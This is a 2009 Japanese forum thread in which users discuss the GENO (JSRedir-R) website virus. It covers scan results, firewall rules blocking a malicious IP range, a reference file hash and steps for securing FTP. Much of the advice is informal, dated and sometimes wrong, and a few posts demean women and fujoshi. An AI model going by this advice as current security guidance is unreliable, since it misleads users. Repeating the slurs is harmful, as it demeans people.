いちどジャンル内にウイルスが持ち込まれたら
広がり方が半端ない
158 :
GENO:2009/05/17(日) 00:15:38 ID:Z6bnpR8d0
>>149 亜種だからさっさとクリーンインストしろ
同人界隈の大手は、ページの更新早いから感染も早けりゃ対策も早いから
良いような悪いような・・・・
160 :
GENO:2009/05/17(日) 00:15:49 ID:v994f/2/0
161 :
GENO報告:2009/05/17(日) 00:15:56 ID:gtxnXe1E0
162 :
GENO:2009/05/17(日) 00:16:45 ID:oBYf4Cnp0
163 :
GENO:2009/05/17(日) 00:16:52 ID:LoBLoCup0
164 :
GENO:2009/05/17(日) 00:16:57 ID:Ee2VdHkT0
お、自分のところもFC2復帰したよ
ウイルスは関係ないのかな
165 :
geno:2009/05/17(日) 00:17:04 ID:SK1PylRj0
どうもNorton 360じゃIP指定遮断ってできない?
166 :
GENO:2009/05/17(日) 00:17:08 ID:iqYagjBU0
カスペがデータベース更新のところでエラー停止するんだけど何で…
JAVAアプレット開始に失敗しました!って出るときと出ない時とあるんだけど
同じ人いるかなぁ
ニフティでは一応シロだったけど
avastアンチウィルスチェストに入ってきたkernel32.dllの最終更新が3月21日なのが
偶然にしては気持ち悪い(ウィルスなしと出てる)
ヘルプファイルの改ざん更新日も3/21だったよね?
167 :
GENO:2009/05/17(日) 00:17:15 ID:2lEMbi/c0
一応cmd.exe、regedit.exe両方とも立ち上がるし、
ニフティのオンラインスキャンの「推奨」でウイルスは発見されなかったんだけど、
カスペのオフ版でフルスキャンしたほうがいい?
168 :
GENO:2009/05/17(日) 00:17:41 ID:oEaRezq70
169 :
GENO:2009/05/17(日) 00:17:42 ID:htjdXkV+0
ただ火狐使えば安心と思っちゃってる奴増えてんなー
普通に感染対象なのに
170 :
メサペア:2009/05/17(日) 00:17:47 ID:tTXdAGaVO
携帯のフルブラウザで見てるんで、感染した可能性があるんだけど、どうしたら良いの?
171 :
GENO:2009/05/17(日) 00:18:29 ID:yUEuwgMB0
とりあえず感染してないのを確認したら何もせずに寝るのが一番良いんでねーの?
172 :
GENO:2009/05/17(日) 00:18:37 ID:+Ile/hUn0
173 :
GENO:2009/05/17(日) 00:18:50 ID:mXU46OMrO
174 :
GEO:2009/05/17(日) 00:19:20 ID:AnYwp8RhO
質問です
Windows Meの場合、C:\WINDOWS\system32\sqlsodbc.chmは元からあるものでしょうか?
ちなみに検索かけたらありませんでした
Pixivが異様に重いんだが
俺だけか?
>>169 それでなくても火狐ってまんま使ってると危ないしな
177 :
GENO:2009/05/17(日) 00:19:56 ID:OoqNXy6Z0
自分もカスペノオンラインスキャンしようとしたら何回やっても
アップデートに失敗しましたってのが出る
javaScript切ったりはしてない。なんでだ。
178 :
GENO:2009/05/17(日) 00:20:02 ID:LoBLoCup0
>>172 あるいは無関係の別のウイルスかも知れん
179 :
GENO:2009/05/17(日) 00:20:09 ID:ELx2C7C+O
>>3 検討お願いします
サイト名を英ソフォスの命名に変えた方がいいのでは
前スレのITproの記事から【JSRedir-R】
180 :
GE:2009/05/17(日) 00:20:09 ID:O6lqE1pR0
181 :
3:2009/05/17(日) 00:20:11 ID:nbm7ZJwf0
182 :
GENO:2009/05/17(日) 00:20:16 ID:/3OwKYN30
183 :
sage:2009/05/17(日) 00:20:19 ID:vQxQiZOp0
184 :
GENO:2009/05/17(日) 00:20:27 ID:pD99LGaB0
>>119 そうだったのか
FW消してしまったww
185 :
GENO:2009/05/17(日) 00:20:30 ID:a9e6Eyfn0
186 :
GENO:2009/05/17(日) 00:20:32 ID:VX7Lo5H7P
ウィルスの情報とかwikiは拡散するべき?
187 :
GENO:2009/05/17(日) 00:20:39 ID:onHfnISQ0
188 :
geno:2009/05/17(日) 00:20:54 ID:hqnP7TwX0
昼から進みすぎだなw
>>141見てここで唱える陰謀論が有るとすれば火狐関係者がこの機にIE駆逐しy
おっと誰か来たようだな。
189 :
GENO:2009/05/17(日) 00:20:55 ID:o+iDNMbs0
>>145 >>147 >>153 ありがとう
分かっちゃいたけどZERO…お前って奴は本当に…
アンインストとなると色々あって夕方以降になるし、重複しても平気なんだったらavastインストしとこうかな
190 :
geno:2009/05/17(日) 00:21:00 ID:kDSj2MIb0
もしかしたら明日の大阪のイベントの方でてんぱってたり
早寝してたりするのかもしれない>腐女子
実際専スレにここのスレ貼られても「豚のほうが心配」とか言ってたバカがいた
ネット?なくても生きていけるしwwwて感じなんだろうなあ
感染して痛い目にあえばいいと思えてきた
191 :
GENO:2009/05/17(日) 00:21:07 ID:O/DTZ3Lf0
fc2復帰したな
たびたび出てるけど携帯ってどうなんだろうな
フルブラウザだと感染するのか?
FTP使ってないからサイトのパスは大丈夫だとしても携帯のネットバンクとかあるよな
192 :
GENO:2009/05/17(日) 00:21:25 ID:TGfcaOSO0
>>174 セキュリティ板の方で聞いた方がよくないか
193 :
GENO:2009/05/17(日) 00:21:28 ID:+Ile/hUn0
>>178 おk
とりあえずノートンは使い物にならんということがよくわかった
194 :
GENO:2009/05/17(日) 00:21:39 ID:jg6WWDTm0
>>170 携帯はOSが違う
MACやLinuxと同じでJSは解釈するけど現在のところ携帯の感染報告はないよ
195 :
g:2009/05/17(日) 00:22:02 ID:jpopUHeK0
>>166>>177 オンラインスキャンだよね?
自分もデータベースアップデートの所でエラーが出て進めない
196 :
GENO:2009/05/17(日) 00:22:11 ID:wsFKGO1y0
>167
完全スキャン推奨
あと完全スキャン→全般で「すべてのファイルをスキャン」にしろよ。
ファイル形式によるスキャン・拡張子によるスキャンは亜種を取りこぼす危険性がある
自ジャンルはだめだ…注意喚起するブログはいくつか出ているけど、大半の管理人・
閲覧者とも明日のイベントに意識が向いてしまってWebサイト感染をメールフォームで
報告してもスルーされてる。
197 :
GENO:2009/05/17(日) 00:22:13 ID:R4Q5u5lq0
何度かIEの強制終了があった上、昨日バスターが強制終了されて
青くなってたんだが、バスターでの検索・sqlsodbc.chm・cmd.exe・regedit.exeの
チェックしたらセーフだった
しかしこないだから、動画サイトとかフラッシュプレーヤー使ったサイトが
見られない…最新バージョンダウンロードしても駄目だし…
198 :
GENO:2009/05/17(日) 00:22:20 ID:oBYf4Cnp0
199 :
geno:2009/05/17(日) 00:23:01 ID:mTkl1Ypu0
自分の環境だとカスペはインターフェイス変わってから
「JAVAアプレット開始に失敗しました!」って必ず出る様になった
もう数ヶ月前からずっとこれだから諦めて、今はニフのオンラインスキャンしてるよ
200 :
geno:2009/05/17(日) 00:23:26 ID:9wncY9JGO
>>192 下手にあそこには意見も止めない方がいいよ
変なのも沸いてるし最低限見とくだけにしとこう
202 :
GENO:2009/05/17(日) 00:23:31 ID:oQYQwuuE0
>>189 町にパソコン専門店があるなら駆け込んでカスペル購入したらどうだい
avastも良いけど、検出率最強なのはカスペルだからね。
204 :
GENO:2009/05/17(日) 00:24:01 ID:VOLUBEdg0
>>149 カスペオンラインやって真っ赤だったから焦ったら、
全部メーラーの迷惑メールフォルダ内のファイルだった
なんてこともあるから冷静に
さっきの自分だよ
205 :
GENO:2009/05/17(日) 00:24:29 ID:tTXdAGaVO
>>194 ありがとう。安心した。
念のために聞いておくけど、PS3やPSPみたいにインターネットブラウザ機能のあるゲーム機があるけど、
あれからのアクセスも危ないのかな?
206 :
geno:2009/05/17(日) 00:24:36 ID:CrTL2fK3P
207 :
GENO:2009/05/17(日) 00:24:36 ID:DOJfiSq80
>>190 パソコン<<<自分の命
なのは当然な気もするが
208 :
GENO:2009/05/17(日) 00:24:43 ID:2lEMbi/c0
209 :
GENO:2009/05/17(日) 00:25:19 ID:htjdXkV+0
>>188 単純に火狐使えば安全ってわけでもないんだがね
スクリプト解析したら普通に対象になってるらしいし
210 :
geno:2009/05/17(日) 00:25:54 ID:Il+SPzcZO
211 :
GENO:2009/05/17(日) 00:26:31 ID:2LNaQ+620
>190
ボカロも似たような状態なわけだが
イベントのが大事
212 :
GENO:2009/05/17(日) 00:26:57 ID:Z6bnpR8d0
結局ウイルスソフトはウイルスバスターが一番いいの?
213 :
GENO:2009/05/17(日) 00:27:13 ID:5RSVn9DW0
豚の方が心配をバカって言うのはどうなのよ
近所に住んでるから怖いよそっちも
家にいても外出ても落ち着かねー
214 :
GENO:2009/05/17(日) 00:27:21 ID:CK94tBT00
>pixivが重い。。
>1分未満前 webで
pixiv運営のダイイングメッセージかこれ?
215 :
GENO:2009/05/17(日) 00:27:20 ID:kgcBFO3/0
>>166 自分もずっとその状態が続いてる
okwaveやyahooに同じ状態の人が何人か質問してた
体験版でスキャンするしかないかな
216 :
GENO:2009/05/17(日) 00:27:21 ID:j2QAnOHk0
他所覗いてきたが
「〜が感染すれば面白いな」とか「〜厨のせいで」
とかの発言に狂気を感じるわ
217 :
GENO:2009/05/17(日) 00:27:28 ID:/f3tzzefP
>>190 腐女叩きはよそでやってくれんかね?
自分の思い通りじゃないと痛い目見ろってどんだけ幼稚なんだよ
218 :
GE:2009/05/17(日) 00:27:51 ID:O6lqE1pR0
>>205 ウィルスというのはwindowsを狙ったものがほとんどなんだよ。
windowsがクライアントPC圧倒的だから
219 :
GENO:2009/05/17(日) 00:27:56 ID:U33DfpPQ0
ウイルス?そんなんよりイベントのが大事!
とか言ってる人に限って感染してると
何で早く教えてくれなかったんだ!と切れるっていうね…
220 :
geno:2009/05/17(日) 00:28:06 ID:hqnP7TwX0
>>195 使ってるアンチウイルスによっては遮断されるとか
一時的にアバストやらバスターやら停止してオンラインスキャンかけてみな
221 :
GENO:2009/05/17(日) 00:28:11 ID:aYWY2y+O0
222 :
GENO報告:2009/05/17(日) 00:28:15 ID:crTm3bJ70
>>3 牛寺スレより
平成ライダー
電凹サイトの他に剣サイトでも感染の報告ありです
223 :
GENO:2009/05/17(日) 00:28:18 ID:KzlawzX60
なんでSP最新版にしなかったんだといわれても、最新版にすると大体危険な不具合がって
後々どっかでニュースになるから様子見してたらそのまま忘れてしまったんだよな
まぁ感染してなかったから大人しくしてるけど
224 :
GENO:2009/05/17(日) 00:28:19 ID:k/dYf2fw0
>>3 ●NortonInternetSecurity2008の設定方法
「個別」 95.129.145.58
は
「範囲」 95.129.144.0-95.129.145.255
内に含まれるアドレスです。
まあ書かれている順番でアドレスを打ち込んでいけば
ノートン先生が注意してくれるので設定自体は混乱しないと思いますが
念のためアドレス情報の再確認をした方がいいかも。
225 :
geno:2009/05/17(日) 00:28:26 ID:kDSj2MIb0
>198、200
まあそれはそうなんだけどさ
今のまま、何もしない状態で新刊情報とかチェックしにサイト巡りしたら
知らないうちに短時間でオンラインパンデミック、なんてことになりかねない
自衛はしといてほしいじゃん…知ってるならさ
226 :
GENO:2009/05/17(日) 00:28:31 ID:e34wWh680
赤豚と豚インフルが混じってるぞおまいら
227 :
GENO:2009/05/17(日) 00:28:32 ID:VX7Lo5H7P
228 :
GENO:2009/05/17(日) 00:29:12 ID:Mk4tVeWS0
豚の方が心配なのは仕方ないなw
実際問題、PCがなくても人は生きてはいけるが
耐性のないリアルウイルスだと生死に関わるからな…
229 :
GENO:2009/05/17(日) 00:29:44 ID:PVnb7lZv0
>>225 あれじゃ腐女子叩きたいようにしか見えん
言い方が悪いわ
あと別に肩持つ訳じゃないが豚はかかったら死ぬ可能性ある
230 :
GENO:2009/05/17(日) 00:29:49 ID:sZeodPf30
231 :
GENO:2009/05/17(日) 00:29:55 ID:WZQN5UgD0
オンラインで原稿作ってる人はPC逝ったらやばいんじゃないの
232 :
GENO:2009/05/17(日) 00:29:59 ID:CK94tBT00
今pixiv繋がる人いる?
233 :
GENO:2009/05/17(日) 00:30:05 ID:jg6WWDTm0
>>190 関西在住ならこっちよりリアルのウイルス感染の方がウエイト重いよ
そりゃ仕方ない
関西在住じゃなくて、遠征組はもう現地入りしてたら即座に対応できないし
何でも叩くのよくないよ
234 :
GENO:2009/05/17(日) 00:30:07 ID:/2pKW8aC0
235 :
GENO:2009/05/17(日) 00:30:11 ID:rNsgBc2X0
236 :
GENO:2009/05/17(日) 00:30:39 ID:gcrAZKPK0
豚って赤豚のことじゃないの?
237 :
GENO:2009/05/17(日) 00:30:48 ID:oQYQwuuE0
ウィルスが流行るといつもこうだが、怖くてリンクがクリック出来なくなるな
238 :
geno:2009/05/17(日) 00:30:54 ID:iXwzbT0Q0
>>232 繋がらない。というかエラーの連続。
だめだウイルスのせいで疑心暗鬼になっている…早く終わってくれ
239 :
GENO:2009/05/17(日) 00:30:54 ID:Q4y83e6WO
皆さんお疲れ様です
感染報告ありの女性向け個人サイト餅の対処として、(Winでxp、詳しい知識ない)
pcの感染はないか確認
flashとかアップロード
IEはjs無効にする
サイトのhtml記述を確認
ffftpはソフトごと削除
用心に拍手(公式を借りてる)とサーチとブログ(fc2)へのリンクは切ってウィルス注意と出してきた
これでもう一度感染チェックして暫くpcごと開かなかったら、(ネットワーク遮断で利用する)
自衛とゾンビサイト化は防げるでFAと思っていい?
勿論、毎日このスレはROMする
240 :
GENO:2009/05/17(日) 00:31:03 ID:/Px2M/Tz0
カスペのスキャンってオンラインスキャンよりトライアル版落としてやった方がいいの?
初歩的な事ですまん。
241 :
GENO:2009/05/17(日) 00:31:25 ID:sYclzj/p0
まとめサイトのIP遮断方法はノートンのだけしか載ってないのか
242 :
geno:2009/05/17(日) 00:31:41 ID:/3OwKYN30
>>232 つながんね。今回はいつにもましてヒドイな…
243 :
GENO:2009/05/17(日) 00:31:52 ID:KLZpyR49O
youtube見れない
244 :
げの:2009/05/17(日) 00:32:11 ID:axZkSb/W0
前スレとか見てきたけど、携帯は例えフルブラウザで見ても
OSの問題で結局感染しないってことでおkですか?
だとすると、wiki注意書きの「携帯閲覧は平気?」の項目の書き方は
誤解を招く恐れがあるので書き換えた方が良いのではないでしょうか。
245 :
geno:2009/05/17(日) 00:32:11 ID:UQqa5mSB0
246 :
GENO:2009/05/17(日) 00:32:22 ID:Lhfrn/670
247 :
GENO:2009/05/17(日) 00:32:29 ID:8yHdaheX0
248 :
げの:2009/05/17(日) 00:32:33 ID:YMu+9f/FO
かぺるオンラインのデータベース重いなあ
やっぱアクセス殺到してるんだろうか
249 :
GENO:2009/05/17(日) 00:32:36 ID:WZQN5UgD0
>>190の言ってる中の豚とは豚インフルじゃなくて
赤/ブ/ー/ブ/ー主催、通称赤豚っていうイベントのことだよ
250 :
GENO:2009/05/17(日) 00:32:43 ID:Ee2VdHkT0
赤豚というイベントの方が大事な人
赤豚というイベントに行って豚インフルにかからないか不安な人
がいるってことだろ
251 :
g:2009/05/17(日) 00:32:47 ID:jpopUHeK0
ニフティオンラインスキャンでやってみたら
1つ感染してたんだけどJANEの借金生活板の過去ログで
Exploit.HTML.Mhtつうウイルスだった
252 :
GENO:2009/05/17(日) 00:32:50 ID:owV3p7qMO
>>213 >>190が言いたかったのは豚の心配するのが馬鹿とかじゃなく
豚に対する警戒に比べウイルスに対する警戒がなさすぎってことを強調したかっただけでは
253 :
GENO:2009/05/17(日) 00:32:58 ID:4MOMvxOF0
身内の隠蔽体質、知識不足、自己保身、陰湿さ
こりゃ被害拡大は免れないかも
801系は中国のような腐海だからなぁ、女の悪いところ全部が最悪の方向で出てるな
254 :
GENO:2009/05/17(日) 00:33:06 ID:GVXgZf08P
>>241 kerioやoutpostの対策も是非載せてほしい
255 :
GENO:2009/05/17(日) 00:33:08 ID:O15VNW6S0
pixivとfc2は鯖側で404だと思う
256 :
GENO:2009/05/17(日) 00:33:20 ID:F89TTXiT0
>241
ノートンしか持ってないから情報落とせないんだ
他ソフト持ちの情報が落とされるといいんだけど
257 :
GENO:2009/05/17(日) 00:33:25 ID:G0Y+AEiE0
258 :
GENO:2009/05/17(日) 00:33:32 ID:lOQh6FbQ0
>>241 他のファイヤーウォール使ってて詳しい人が居たら教えてほしいね
ずっとノートンだから他はわからん
259 :
GENO:2009/05/17(日) 00:33:43 ID:VX7Lo5H7P
260 :
GENO:2009/05/17(日) 00:34:10 ID:ON3fpJXr0
ここぞとばかりに腐女子叩くバカは他でやってくれ
261 :
GENO:2009/05/17(日) 00:34:11 ID:oQYQwuuE0
>>204 俺もカスペルでスキャンして1つだけ検出して何だと思ったら
専ブラに保存されてるウィルスコードが貼られたスレのdatファイルだった事がある
262 :
GENO:2009/05/17(日) 00:34:20 ID:Z6bnpR8d0
ε ⌒ヘ⌒ヽフ
( ( ・ω・)
_...。゚しー し─J
⊂...__....⊃ ジョロジョロ〜
263 :
geno:2009/05/17(日) 00:34:25 ID:htzc9FVB0
ノートン先生お休みしすぎだろ
>>252 優先順位ってもんがあるだろ
自分の命とPCを天秤にかけて
PCを選ぶ馬鹿がどこにいるよ
265 :
GENO:2009/05/17(日) 00:34:29 ID:MtuFAoh60
どうも自サイトに見慣れないソースがありまして…Mac者なので今の所PCは
問題なさげなんですが、この場合、サイトを削除して再度ウプすれば問題
ないのでしょうか?無知ですみません…
266 :
GENO:2009/05/17(日) 00:34:37 ID:O15VNW6S0
>>253 見えない敵と戦うのは辛いだろうから林先生とこ行ってきな?
少しは楽になるかもよ…
267 :
3:2009/05/17(日) 00:34:58 ID:nbm7ZJwf0
>>179について意見求む
とりあえずトップページ1行目を
>現在新種のコンピュータウイルス「JSRedir-R」(通称GENOウイルス)が急速に拡大中です。
に変えればいいんじゃないかと思ってますが。
正式名出た以上通称でも文句言われたりするんだろうか。
サイト名とかは現行でいいすか?通称つけたほうがいい?JSRedir-Rに変える?
>>222追加しました
>>224ごめんどう手を加えたらいいのかワカンネ
修正箇所と修正内容レスしてくれたら書き換えるよ
(235まで確認)
268 :
GENO:2009/05/17(日) 00:35:07 ID:oqwjvISdP
269 :
GENO:2009/05/17(日) 00:35:35 ID:Ee2VdHkT0
270 :
geno:2009/05/17(日) 00:35:44 ID:GytLXJEE0
>>264 他人様への多大な迷惑と自分の楽しみを秤にかけて
自分の楽しみを優先したバカなら今回の件でも豚フルの件でもいたけどな
271 :
GENO:2009/05/17(日) 00:36:08 ID:U33DfpPQ0
自己保身もいい方向に働けばいいんだけどね
せめて自分だけは潔白でいたいとか
他板でもウイルス?よくワカンネってレスも見る
今北産業みたいなのもあった方がわかりやすいかも
272 :
GENO:2009/05/17(日) 00:36:11 ID:qhpSIwHs0
IP遮断方法ってそれぞれのセキュリティソフトのサイトに書いてないの?
273 :
GENO:2009/05/17(日) 00:36:24 ID:EubD8DPe0
豚をイベントのほうだと思ったのは書き込んだ人じゃなくて読んだあなたの思い込みではないの?
274 :
21:2009/05/17(日) 00:36:51 ID:kPCmhpdK0
お前ら喧嘩すんなw
ところで、
>>21を書いた者なんだが、反応が無いのは
このスレにBuffalo使いがいないのか、パケットフィルタは意味無いのか、書き方が悪いのか、一体どれなんだろう。
275 :
GENO:2009/05/17(日) 00:37:01 ID:OukNUfSz0
カスペスキャンしたら数年前の専ブラのログの書き込みに反応した
…それはノートントラップだ…
昨日だけで4回はスキャンしたな…疲れた…
>>165 自分も360だからこのやり方だと思うんだけど
設定でファイアーウォールの保護からトラフィックルールのタブで追加
そこから他のノートンと一緒
277 :
GENO:2009/05/17(日) 00:37:09 ID:Jdo1c4yt0
まとめサイト繋がる? なんか表示が不安定なんだけど
ただ重いだけならいいけどまた何かあったんじゃないかと心配
278 :
GD:2009/05/17(日) 00:37:18 ID:ueGxpPuI0
Remote Registryサービスを止めるってのは対抗策にならない?
279 :
GENO:2009/05/17(日) 00:37:31 ID:2LNaQ+620
どちらにしろ同じもんじゃないか?
赤豚イベント開催場所=豚フル発生地帯なんだから
280 :
ウィルス:2009/05/17(日) 00:37:39 ID:uCG8VfosO
腐叩きしてんのは
東方厨だから気にするな
281 :
geno:2009/05/17(日) 00:37:42 ID:Lmy8/K2O0
pixiv復活
282 :
GENO:2009/05/17(日) 00:37:52 ID:ktp9hXMLO
>>244 基本的にPCのウイルスは携帯には感染しない
実行出来ないから
283 :
g:2009/05/17(日) 00:38:09 ID:jpopUHeK0
ノートン先生切ってカスペオンラインに挑んだけどやっぱり
エラーがでる('A`)
そして毎回「連続投稿ですか?」って出るの何とかならないのかな
284 :
GENO:2009/05/17(日) 00:38:26 ID:9GZ3Whcs0
>>267 今はほとんどの人が「GENOウィルス」で認識してるから、
その略称は消さない方がいいと思います
285 :
geno:2009/05/17(日) 00:38:38 ID:9wncY9JGO
自分のパソコンが感染してないのを確認してからサイトは一切いじってない
注意喚起もせず自己中で薄情かもしれんが、亜種のことを聞くと二次被害出しそうで怖いんだよ
286 :
geno:2009/05/17(日) 00:38:57 ID:GytLXJEE0
>>274 1:たまたまBuffalo使いがいない
2:みんな分かってた
3:ありがたいと思ったけど報告してない
4:ようわからん
5:NTT製となっているルータにBuffalo製が含まれていることを知らない
287 :
GENO:2009/05/17(日) 00:39:02 ID:LoBLoCup0
>>3 (
>>267)
>>125にも書いたんですが、FTP以外の個人情報についてはまだ不明なのです。
なので以下のように書き換えを提案したいのですが……。
> 感染されたサイトを閲覧した時点でPCが感染、FTPのIDやパスが抜かれる、
> クレジットカード等、ネットを介して利用する個人情報の類いが抜かれる、
> Acrobatが挙動不審になる等の問題を引き起こします。
↓
感染されたサイトを閲覧した時点でPCが感染、FTPのIDやパスが抜かれる、
Acrobatが挙動不審になる等の問題を引き起こすことが確認されています。
また、現状ではまだ確認されていませんが、
通販サイトやウェブメール等、WEBブラウザを介したWEBサービスで利用する
IDやパスワード、クレジットカード情報等の個人情報が抜かれる可能性もあります。
288 :
GENO:2009/05/17(日) 00:39:17 ID:B6mAk7ZT0
感染してないみたいだ。良かった…
サイトには注意書きとwikiへのリンク貼っておいた
これ犯人見つかったらどれくらい罪重いんだろうな
289 :
GENO:2009/05/17(日) 00:39:18 ID:F89TTXiT0
290 :
GENO:2009/05/17(日) 00:39:29 ID:x35gg08k0
291 :
GENO:2009/05/17(日) 00:39:36 ID:O15VNW6S0
>>267 今までのから見てわかりやすさを求めるならば
現在新種のコンピュータウイルス通称GENOウイルス(正式名称:「JSRedir-R」)が急速に拡大中です。
の気もするけど、どうなんでしょうね?
文句言われるのかなー…?
上記がまずければ
>>267でいいような気がする。せっかく(ってのも何だけど)正式名称あるなら。
292 :
GENO:2009/05/17(日) 00:39:36 ID:Co0JIJet0
fc2は繋がるようになった。
さっきのはなんだったんだろう。
ところでkingsoftての使ってる人はいる?
293 :
geno:2009/05/17(日) 00:39:44 ID:Q7P7W7Uu0
ウイルス関係以外で雑談やめれ
感情論とか今どうでもいい
294 :
GENO:2009/05/17(日) 00:40:07 ID:zoUEiiwu0
>>281 結構長かったから本当に感染したのかと思ったw
ピクシブが感染したらオタクオワタになるよな。
295 :
geno:2009/05/17(日) 00:40:17 ID:YTQWI9820
なあ、○○が見れない系の関係ない報告はやめないか?
詳しくない奴が見たら混乱するだろ。
http経由のファイルアップしかできない動画サイトやPIXIVを危ぶむ意味がわからん。運営が感染してるとかならわかるが。
wikiは大丈夫かとか携帯やPSPはとか…とか言っちゃうような奴はまず落ち着け。
怖いと感じるのは、対象への理解が足りないから怖いんだと思う。
ちゃんとwiki読めば仕組みがなんとなく分かると思うんだ。
296 :
GENO:2009/05/17(日) 00:40:20 ID:OewM5iMM0
ふたばが感染したってガセ?
297 :
GENO:2009/05/17(日) 00:41:19 ID:D2aaDQpX0
298 :
GENO:2009/05/17(日) 00:41:29 ID:eiE9QTaXO
これあんまりググらない方がいいってのはなんで?
症状の一つに感染者がググると改竄リンクが出るってのはわかるけど
グーグル自体に問題でもあるの?
300 :
GENO:2009/05/17(日) 00:42:16 ID:1pgo0PAq0
301 :
geno:2009/05/17(日) 00:42:28 ID:qaO95sGbO
初心者版は欲しいな
対策とかの言葉で一部分からないところあるし
302 :
21:2009/05/17(日) 00:42:31 ID:kPCmhpdK0
>>286 ww そうかww
いや、なんせ経験の無い事なので自信が無くてね
303 :
GENO:2009/05/17(日) 00:42:36 ID:Q4y83e6WO
>>247 出来る限り対処したいんだけど、じゃあその他何すればいいの?
304 :
GENO:2009/05/17(日) 00:42:44 ID:iqYagjBU0
>>220 JAVAアプレット開始…のメッセージでカスペスキャン出来ないんだけど
スキャンする時だけavastもファイアーウォールも切ってある
セキュリティレベル下げてJSもオンにしてるけど駄目なんだ…
もちろんJAVAアプレットは切ってない
305 :
GENO:2009/05/17(日) 00:43:28 ID:nAyXcGQw0
>1のチェックして無駄だと思いつつもノートン先生でフルスキャンした
何も出なかったけど安心できないので今カスペのオンラインやってるんだが
1時間たってもまだ7%とか…
306 :
geno:2009/05/17(日) 00:43:33 ID:Lgdg/CN90
>>303 「じゃあ」で訊いて教えてもらえると思うな
307 :
GENO:2009/05/17(日) 00:43:37 ID:CK94tBT00
pixiv運営のついったー
# pixivが重い。。24分前 webで
# 対応中です。23分前 webで
# pixivが激しく重いので対応中です。19分前 webで
# 対応しました!3分前 webで
# ご迷惑をおかけしました!!20秒以内前 webで
ヒヤヒヤさせやがって・・・www
308 :
GENO:2009/05/17(日) 00:44:02 ID:k/dYf2fw0
>>3 >>267 や、削る必要があるとするなら「個別」の 95.129.145.58 なんだけど
(「範囲」の方でカバーできてるから)
どこでどう情報が錯綜してるかワカンネから、自信がなければそのままでもいいとオモ。
さっきも書きましたが、普通に書かれてる順番で打ち込んでいけば
ノートン先生が注意してくれるので、大きな混乱にはならないはず。
309 :
GD:2009/05/17(日) 00:44:04 ID:ueGxpPuI0
とりあえず正常ファイル
sqlsodbc.chm
MD5:f639afde02547603a3d3930ee4bf8c12
310 :
geno:2009/05/17(日) 00:44:30 ID:GytLXJEE0
311 :
GENO:2009/05/17(日) 00:44:31 ID:pnEiQLkWP
同人以外の個人サイトは、感染して無反応とか
何度も感染繰り返すようだとURL晒されてるね。
同人だけは特別って認識はどこから来てるんだろう。
312 :
3:2009/05/17(日) 00:44:38 ID:nbm7ZJwf0
>>287 案の定125を見落としていましたスマソ
それで書き換えてきます
>>277 現時点では自分のPC含めおかしいところは見当たらないようだ
今ちょこちょこ書き換えたり削ったりしてるからかもしれん(わからんが)
ずっと続くようならまた報告してください
(293まで確認)
313 :
geno:2009/05/17(日) 00:44:51 ID:GVXgZf08P
>>299 ググッた先のサイトが感染済みの可能性も高いから
314 :
GENO:2009/05/17(日) 00:44:51 ID:8yHdaheX0
>>303 OS再インストール
FTPパスワード変更
315 :
geno:2009/05/17(日) 00:45:36 ID:SK1PylRj0
316 :
244:2009/05/17(日) 00:46:02 ID:axZkSb/W0
>>282 ありがとう、安心した
安全だとわかったことだし、携帯でソース見れるサイトあったから、
携帯からお気に入りサイトさんが大丈夫か見てこよう
vistaで対策も全部したけど不安すぎるチキン
317 :
geno:2009/05/17(日) 00:46:12 ID:/3OwKYN30
>>303 wiki読んで来い。つか、
>感染報告ありの女性向け個人サイト餅
ってことは、管理人が感染したって事だろ?
まずはならインスコだろ
318 :
geno:2009/05/17(日) 00:46:38 ID:YTQWI9820
>>299 どのサイトが感染してるかわからないからネサフは極力控えろってことだとオモ
亜種も活発みたいだし、書かれている対策を行っているから完全にネットして安心!
…とは言い切れないからなあ
319 :
GENO:2009/05/17(日) 00:46:45 ID:SJfmtU710
>>287 FTPの盗聴によるアカウント抜出ではないの?
だったら、他の件とは切り分けて考えた方が良いと思うんだけど。
320 :
geno:2009/05/17(日) 00:47:06 ID:UQnEuMJQ0
>
>>274 トン 設定した
って書き込みたいんだけど規制かかってんだ…
321 :
GENO:2009/05/17(日) 00:47:08 ID:FnPZ+X/U0
自PCからちょっと安心してネサフしたい窓ユーザはデュアルブートで
linuxでも入れたらいい。タダだし
>>3 まとめ乙です
ブリーチ(週間ジャンプ)と十二国記(小説)で個人サイトの
感染確認しました
322 :
GENO:2009/05/17(日) 00:47:08 ID:4MOMvxOF0
323 :
GENO:2009/05/17(日) 00:47:22 ID:G5ZQ6xeC0
324 :
GENO:2009/05/17(日) 00:48:02 ID:B5k2mtIVP
>>303 サイトのファイル全部消し
別のPCか携帯で設定にアクセスしてパスワード変更して休止中インデックスを置く
感染したPCをきれいにする
325 :
GENO:2009/05/17(日) 00:49:03 ID:oQYQwuuE0
久しぶりにiBook起動してネットやろうかな
326 :
GENO:2009/05/17(日) 00:49:06 ID:cGanA1aV0
>>311 そりゃわざわざサイトを検索にひっかからないようにするようなジャンル性だからだろ
327 :
geno:2009/05/17(日) 00:49:20 ID:UQnEuMJQ0
おっと書き込めた当方マカ
Macスレで出てたの投下します
--------ここから----------
10.3までのOSユーザーはFlash Playerを外すか・Acrobatリーダーの
Webブラウザ内閲覧機能を切るかJavaScriptオフにする
TigerとLeopardの人はAcrobatは9.1、Flash Playerは10.0.22.87以上に更新する
またAcrobat Readerの初期設定からAcrobat JavaScriptをオフにする
(AcrobatReaderは「プレビュー.app」で代用可能なので始めから入れない手もある)
Firefox使ってる人は3.0.10に更新してNoScript入れること
非表示状態になったFlashコンテンツをどうしても見たいときはマウスポインタを置いて
リンク先が不正URLでないか確認した上で「一時的に許可」すること
OmniWebなら初期設定→プラグインでFlashプラグインの活動を停止できます
(OmniWebだけのシャットダウン、Safariには影響しません)
自分のサイトが汚染されていないかソースを見て確認すること、FTPパスを変更すること
BootCampでXPを入れている人は
C:%uC2A5WINDOWS%uC2A5system32%uC2A5sqlsodbc.chm このサイズ表示(ディスク上のサイズではない)
50,727 bytes以外の数値に改ざんされていないかチェックすること。
-----------ここまで-----------
ClamXavも頻繁にアップデートされてるので要チェック
328 :
GENO:2009/05/17(日) 00:49:30 ID:iXwzbT0Q0
これは取り敢えず感染してなかったらジッとしてるでOKなんだよな
329 :
geno:2009/05/17(日) 00:49:37 ID:NETijJQB0
皆、自サイトに注意書きしてる?
330 :
GENO:2009/05/17(日) 00:49:49 ID:jg6WWDTm0
>>303 今回はどんな対応でも太鼓判が押せない
完璧な対応なんてない
感染が怖いならWindows以外のOS使うか、携帯使うしかない
331 :
GENO:2009/05/17(日) 00:50:01 ID:F89TTXiT0
■ファイアーウォール
ノートン・バスターだったら
